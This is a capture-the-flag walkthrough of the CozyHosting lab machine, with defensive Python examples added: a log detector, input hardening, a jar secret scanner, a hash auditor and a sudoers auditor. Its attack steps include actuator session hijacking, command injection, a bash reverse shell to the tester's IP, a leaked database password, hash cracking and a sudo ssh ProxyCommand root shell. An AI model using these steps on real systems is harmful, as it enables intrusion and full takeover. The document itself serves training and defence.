We can begin with a port scan as usual:
╰─ nmap -sC -sV 10.129.110.213
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-04 10:17 EDT
Nmap scan report for 10.129.110.213
Host is up (0.030s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_ 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.03 seconds
We can add cozyhosting.htb to our /etc/hosts file and take a look at the site.
The site has a login page, but we aren’t able to make an account. While we look at the site a bit more, we can spin up some directory enumeration:
╰─ dirsearch -u http://cozyhosting.htb/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/cozyhosting.htb/-_23-09-04_10-19-20.txt
Error Log: /home/kali/.dirsearch/logs/errors-23-09-04_10-19-20.log
Target: http://cozyhosting.htb/
[10:19:20] Starting:
[10:19:27] 200 - 0B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js
[10:19:31] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:19:32] 400 - 435B - /a%5c.aspx
[10:19:33] 200 - 634B - /actuator
[10:19:34] 200 - 95B - /actuator/sessions
[10:19:34] 200 - 10KB - /actuator/mappings
[10:19:34] 200 - 5KB - /actuator/env
[10:19:34] 200 - 15B - /actuator/health
[10:19:34] 200 - 124KB - /actuator/beans
[10:19:34] 401 - 97B - /admin
[10:19:53] 200 - 0B - /engine/classes/swfupload//swfupload_f9.swf
[10:19:53] 200 - 0B - /engine/classes/swfupload//swfupload.swf
[10:19:53] 500 - 73B - /error
[10:19:53] 200 - 0B - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[10:19:53] 200 - 0B - /extjs/resources//charts.swf
[10:19:56] 200 - 0B - /html/js/misc/swfupload//swfupload.swf
[10:19:57] 200 - 12KB - /index
[10:20:00] 200 - 4KB - /login
[10:20:00] 200 - 0B - /login.wdm%2e
[10:20:01] 204 - 0B - /logout
[10:20:12] 400 - 435B - /servlet/%C0%AE%C0%AE%C0%AF
Task Completed
We see some interesting actuator directories, and looking at /sessions shows the following:
Interesting. We can try to go to the /admin endpoint, but we get redirected to the login page. Let’s try to capture the request in Burp Suite and see what we can figure out.
You can capture a login request to get a session ID that we can swap out with the kanderson session ID:
Then, we can forward the request and log into the admin page:
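From the defender's side, both the dirsearch burst and the actuator hits above leave obvious traces in the nginx access log. The following Python is an added example, not code from this write-up: it parses combined-format log lines (the sample lines are constructed for the example and only mirror the kind of traffic a directory scan produces), flags requests to Spring Boot actuator endpoints other than /actuator/health, and flags source IPs that request many distinct paths inside a short window. The 60-second window and the distinct-path threshold are assumptions to tune against normal traffic.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed nginx access-log lines (combined format) for this example only.
SAMPLE_LOG = """\
10.10.14.18 - - [04/Sep/2023:10:19:27 -0400] "GET /Citrix//AccessPlatform/auth/clientscripts/cookies.js HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.18 - - [04/Sep/2023:10:19:31 -0400] "GET /a%5c.aspx HTTP/1.1" 400 435 "-" "Mozilla/5.0"
10.10.14.18 - - [04/Sep/2023:10:19:33 -0400] "GET /actuator HTTP/1.1" 200 634 "-" "Mozilla/5.0"
10.10.14.18 - - [04/Sep/2023:10:19:34 -0400] "GET /actuator/sessions HTTP/1.1" 200 95 "-" "Mozilla/5.0"
10.10.14.18 - - [04/Sep/2023:10:19:34 -0400] "GET /actuator/env HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.18 - - [04/Sep/2023:10:19:34 -0400] "GET /admin HTTP/1.1" 401 97 "-" "Mozilla/5.0"
10.10.14.18 - - [04/Sep/2023:10:19:53 -0400] "GET /error HTTP/1.1" 500 73 "-" "Mozilla/5.0"
10.10.14.18 - - [04/Sep/2023:10:19:53 -0400] "GET /extjs/resources//charts.swf HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.18 - - [04/Sep/2023:10:20:00 -0400] "GET /login.wdm%2e HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.18 - - [04/Sep/2023:10:20:12 -0400] "GET /servlet/%C0%AE%C0%AE%C0%AF HTTP/1.1" 400 435 "-" "Mozilla/5.0"
10.10.14.50 - - [04/Sep/2023:10:20:30 -0400] "GET /login HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.10.14.50 - - [04/Sep/2023:10:20:45 -0400] "GET /actuator/health HTTP/1.1" 200 15 "-" "kube-probe/1.27"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entries.append({
            "ip": m["ip"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "path": m["path"].split("?", 1)[0],   # drop the query string
            "status": int(m["status"]),
        })
    return entries


def actuator_hits(entries, allowed=("/actuator/health",)):
    """Requests to Spring Boot actuator endpoints that are not on the allow list.
    A 200 here means the endpoint answered an unauthenticated client."""
    hits = []
    for e in entries:
        p = e["path"].rstrip("/") or "/"
        if (p == "/actuator" or p.startswith("/actuator/")) and p not in allowed:
            hits.append((e["ip"], p, e["status"]))
    return hits


def enumeration_sources(entries, window_s=60, min_distinct=8):
    """IPs that request at least min_distinct distinct paths inside any
    window_s-second window (assumed thresholds). Returns {ip: largest
    distinct-path count seen in one window}."""
    by_ip = defaultdict(list)
    for e in entries:
        by_ip[e["ip"]].append(e)
    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it is within window_s of the end.
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > window_s:
                start += 1
            distinct = len({e["path"] for e in evs[start:end + 1]})
            if distinct >= min_distinct:
                flagged[ip] = max(flagged.get(ip, 0), distinct)
    return flagged


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    for ip, path, status in actuator_hits(entries):
        print(f"actuator probe: {ip} -> {path} ({status})")
    for ip, n in enumeration_sources(entries).items():
        print(f"enumeration: {ip} requested {n} distinct paths within 60s")
```

Detection is the second half of the story; the first is not exposing the endpoints at all. In Spring Boot the exposure list is controlled by `management.endpoints.web.exposure.include`, so limiting it to `health` (or putting the actuator behind authentication) is what stops /actuator/sessions and /actuator/env from answering anonymous clients in the first place.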
We can create new connections from this dashboard, so let’s capture a request from it and play around with what types of inputs it will take.
If you try some of the common command injection payloads from HackTricks, you’ll be able to reach out to your own IP address:
Then on our python HTTP server:
╰─ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.110.213 - - [04/Sep/2023 11:40:22] "GET / HTTP/1.1" 200 -
We can take this further by hosting a bash reverse shell that the target will request and run, which should send us a shell on our listening port.
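The root cause here is that a value from the connection form reaches a shell. As an added example (not the application's code, which the page does not show), here is that vulnerable pattern beside a hardened version in Python: the hardened form validates the hostname and username against strict allow-list patterns and builds an argv list, so no shell ever parses the values. The ssh command line, the `app` default username and the hostname pattern are assumptions.

```python
import re
import subprocess

# RFC 1123-style hostname (or dotted IPv4): labels of letters, digits and
# interior hyphens, at most 63 chars per label and 253 in total. Anything else is
# rejected, which also rules out shell metacharacters, whitespace and a leading '-'.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
# Conservative POSIX-style user name.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def unsafe_command(host, user="app"):
    """The vulnerable pattern: user input interpolated into a shell string that
    the application then hands to subprocess.run(..., shell=True). A value that
    contains shell metacharacters becomes additional commands. Returned here
    for illustration and never executed."""
    return f"ssh -o ConnectTimeout=5 {user}@{host} exit"


def validate_hostname(host):
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return host


def validate_username(user):
    if not USERNAME_RE.fullmatch(user):
        raise ValueError(f"rejected username: {user!r}")
    return user


def safe_argv(host, user="app"):
    """Hardened form: allow-list validation, then an argv list so no shell parses
    the values. '--' ends ssh option parsing, so a value can never be read as an
    ssh flag even if the validation were loosened later."""
    host = validate_hostname(host)
    user = validate_username(user)
    return ["ssh", "-o", "ConnectTimeout=5", "--", f"{user}@{host}", "exit"]


def is_valid_target(host, user="app"):
    """True when the pair passes validation; used to reject form input early."""
    try:
        safe_argv(host, user)
    except ValueError:
        return False
    return True


def check_connection(host, user="app", timeout=10):
    """Run the hardened command (needs ssh on PATH; not exercised offline)."""
    result = subprocess.run(safe_argv(host, user), capture_output=True,
                            text=True, timeout=timeout)
    return result.returncode == 0
```

Validation before the argv list matters even without a shell: ssh itself parses options, so a hostname beginning with `-` would otherwise be read as a flag. Rejecting anything outside the hostname grammar, and terminating options with `--`, closes both paths.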
Here is my reverse shell:
╰─ cat shell.sh
/bin/bash -i >& /dev/tcp/10.10.14.18/1337 0>&1
Here is my request in Burp Suite:
And on my listener we get a shell:
╰─ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.18] from cozyhosting.htb [10.129.110.213] 42416
bash: cannot set terminal process group (1000): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$
We see a .jar archive, so we can download it with the same python server strategy and take a look at it in our browser using an online Java decompiler:
We get a password for postgresql, so we can use that to read tables in our shell:
app@cozyhosting:/app$ psql -U postgres -W -h localhost -d cozyhosting
psql -U postgres -W -h localhost -d cozyhosting
Password: Vg&nvzAQ7XxR
\list
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-------------+----------+----------+-------------+-------------+-----------------------
cozyhosting | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
(4 rows)
\c cozyhosting
Password: Vg&nvzAQ7XxR
You are now connected to database "cozyhosting" as user "postgres".
\d
List of relations
Schema | Name | Type | Owner
--------+--------------+----------+----------
public | hosts | table | postgres
public | hosts_id_seq | sequence | postgres
public | users | table | postgres
(3 rows)
SELECT * FROM users;
name | password | role
-----------+--------------------------------------------------------------+-------
kanderson | $2a$10$---SNIP---im | User
admin | $2a$10$---SNIP---dm | Admin
(2 rows)
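The PostgreSQL password came out of a configuration file packed inside the jar, so the matching check on the defensive side is to scan build artifacts for plaintext secrets before they ship. The following Python is an added example, not part of the original post: it builds a small constructed jar in memory with an `application.properties` holding a placeholder password, then scans every configuration file in the archive for secret-looking keys whose values are not `${...}` placeholders. The entry names, key patterns and placeholder rules are assumptions.

```python
import io
import re
import zipfile

# Keys whose values should never be shipped as literals inside an artifact.
SECRET_KEY_RE = re.compile(
    r"(password|passwd|secret|token|api[_-]?key|private[_-]?key)", re.IGNORECASE
)
# properties-style key=value and YAML-style key: value lines.
KV_RE = re.compile(r"^\s*(?P<key>[A-Za-z0-9_.\-]+)\s*[:=]\s*(?P<value>\S.*)$")
CONFIG_SUFFIXES = (".properties", ".yml", ".yaml", ".xml", ".json", ".env")


def build_sample_jar():
    """Constructed jar for this example (not the page's artifact): a Spring Boot
    layout with one plaintext datasource password and one externalised secret."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(
            "BOOT-INF/classes/application.properties",
            "server.port=8080\n"
            "spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting\n"
            "spring.datasource.username=postgres\n"
            "spring.datasource.password=EXAMPLE-PLAINTEXT-PASSWORD\n"
            "spring.mail.password=${MAIL_PASSWORD}\n",
        )
        # A class file is binary, not configuration, so the scan skips it.
        zf.writestr("BOOT-INF/classes/com/example/Application.class", b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def is_placeholder(value):
    """Values resolved at runtime (${ENV_VAR}) or obvious stand-ins are acceptable."""
    v = value.strip().strip("\"'")
    return v == "" or (v.startswith("${") and v.endswith("}")) or v.upper() in {"CHANGEME", "TODO"}


def scan_jar(jar_bytes):
    """Return (entry name, line number, key) for every secret-looking key that
    carries a literal value in any configuration file inside the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(CONFIG_SUFFIXES):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            for lineno, line in enumerate(text.splitlines(), 1):
                m = KV_RE.match(line)
                if m and SECRET_KEY_RE.search(m["key"]) and not is_placeholder(m["value"]):
                    findings.append((info.filename, lineno, m["key"]))
    return findings


if __name__ == "__main__":
    for entry, lineno, key in scan_jar(build_sample_jar()):
        print(f"{entry}:{lineno}: literal value for {key}")
```

Run against real artifacts this belongs in CI, before the jar is published; the placeholder rule is what lets the externalised form (`${MAIL_PASSWORD}` resolved from the environment or a secret store at startup) pass while the literal fails.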
We can take these hashes and crack them with hashcat:
╰─ hashcat -m 3200 hashes.txt ~/Desktop/Useful-Misc./rockyou.txt
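The `$2a$10$` prefix on both hashes is what tells us the algorithm (bcrypt, hashcat mode 3200) and the cost factor. The following Python is an added example, not from the original post: it parses the bcrypt modular-crypt format and reports any hash whose cost is below a policy minimum, together with how many times cheaper each guess is than at that minimum. The sample rows are constructed stand-ins in the bcrypt alphabet (the page's real hashes are redacted), and the minimum cost of 12 is an assumption.

```python
import re

# bcrypt modular-crypt format: $<version>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"^\$(?P<version>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)


def parse_bcrypt(hash_str):
    """Split a bcrypt string into its fields; raises ValueError on anything else."""
    m = BCRYPT_RE.fullmatch(hash_str)
    if not m:
        raise ValueError("not a bcrypt hash")
    return {
        "version": m["version"],
        "cost": int(m["cost"]),
        "salt": m["salt"],
        "digest": m["digest"],
    }


def audit_hashes(rows, min_cost=12):
    """rows: iterable of (name, hash). Returns (name, cost, relative_work) for every
    hash below min_cost, where relative_work = 2 ** (min_cost - cost) is how many
    times cheaper each guess is than it would be at the policy minimum."""
    weak = []
    for name, h in rows:
        cost = parse_bcrypt(h)["cost"]
        if cost < min_cost:
            weak.append((name, cost, 2 ** (min_cost - cost)))
    return weak


# Constructed rows: placeholder salt/digest characters, not real hashes.
SAMPLE_ROWS = [
    ("kanderson", "$2a$10$" + "abcdefghijklmnopqrstuv" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ01234"),
    ("admin",     "$2a$10$" + "vutsrqponmlkjihgfedcba" + "43210ZYXWVUTSRQPONMLKJIHGFEDCBA"),
    ("svc",       "$2b$12$" + "0123456789abcdefghijkl" + "mnopqrstuvwxyzABCDEFGHIJKLMNOPQ"),
]

if __name__ == "__main__":
    for name, cost, work in audit_hashes(SAMPLE_ROWS):
        print(f"{name}: cost {cost}, each guess {work}x cheaper than at cost 12")
```

Cost 10 is a common framework default; each step up doubles the work per guess for the cracker and the server alike, so the audit is about choosing the highest cost the login path can afford, not only about which hashes happen to crack from rockyou.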
Then, we can try to SSH in as the josh user. *We know about josh because, from our first shell, we can read the /etc/passwd file to see the list of users.*
╰─ ssh josh@cozyhosting.htb
josh@cozyhosting.htb's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)
---SNIP---
Last login: Mon Sep 4 16:13:31 2023 from 10.10.14.18
josh@cozyhosting:~$ ls
user.txt
We can use sudo -l to view our privileged permissions:
josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *
If you go on GTFOBins you’ll be able to find a payload that gets us a shell as root:
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)
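The rule `(root) /usr/bin/ssh *` is the kind of thing a sudoers review should catch before anyone reaches GTFOBins: a wildcard argument to a binary that can run other programs through its own options is equivalent to granting a root shell. The following Python is an added example, not from the original post: it parses the rule lines of `sudo -l` output and grades each one. The sample output is constructed around the page's ssh rule, and the list of argument-escape binaries is an illustration rather than a complete policy.

```python
import re

# Binaries whose own options or interactive features can launch another program,
# so a rule that lets the caller pick their arguments is effectively a root shell.
# ssh's ProxyCommand is the case on this box; the others are common examples and
# the set is an assumption, not an exhaustive list.
ARG_ESCAPE_BINARIES = {"ssh", "vim", "vi", "less", "more", "find", "awk", "env", "python3", "perl"}

# One rule line of `sudo -l` output: (runas) [TAG: ...] /path/to/cmd [args]
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?:\s+(?P<args>.*))?$"
)


def audit_sudo_output(text):
    """Classify each rule in `sudo -l` output. Returns (rule, severity, reason)."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # headers and Defaults lines
        cmd = m["cmd"]
        args = (m["args"] or "").strip()
        name = cmd.rsplit("/", 1)[-1]
        rule = line.strip()
        if cmd == "ALL":
            findings.append((rule, "HIGH", "any command as the runas user"))
        elif args == '""':
            findings.append((rule, "OK", "no arguments permitted"))
        elif args == "" or "*" in args:
            # sudoers semantics: no argument spec, or a '*' glob, means any arguments.
            if name in ARG_ESCAPE_BINARIES:
                findings.append((rule, "HIGH", f"{name} with caller-chosen arguments can execute other programs"))
            else:
                findings.append((rule, "MEDIUM", "arguments not pinned; review the binary for escapes"))
        else:
            findings.append((rule, "OK", "fixed arguments"))
    return findings


# Constructed `sudo -l` output: the page's ssh rule plus invented neighbours.
SAMPLE_SUDO_L = """\
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
    (root) /usr/bin/vim
    (root) /usr/bin/less ""
    (ALL) ALL
"""

if __name__ == "__main__":
    for rule, severity, reason in audit_sudo_output(SAMPLE_SUDO_L):
        print(f"{severity:6} {rule}  ({reason})")
```

The fix for the flagged rule is to pin the argument list in sudoers (a fixed destination and options, or `""` for none) or, better, not to grant ssh through sudo at all; since `sudo -l` is cheap to collect, the same check runs well across a whole fleet.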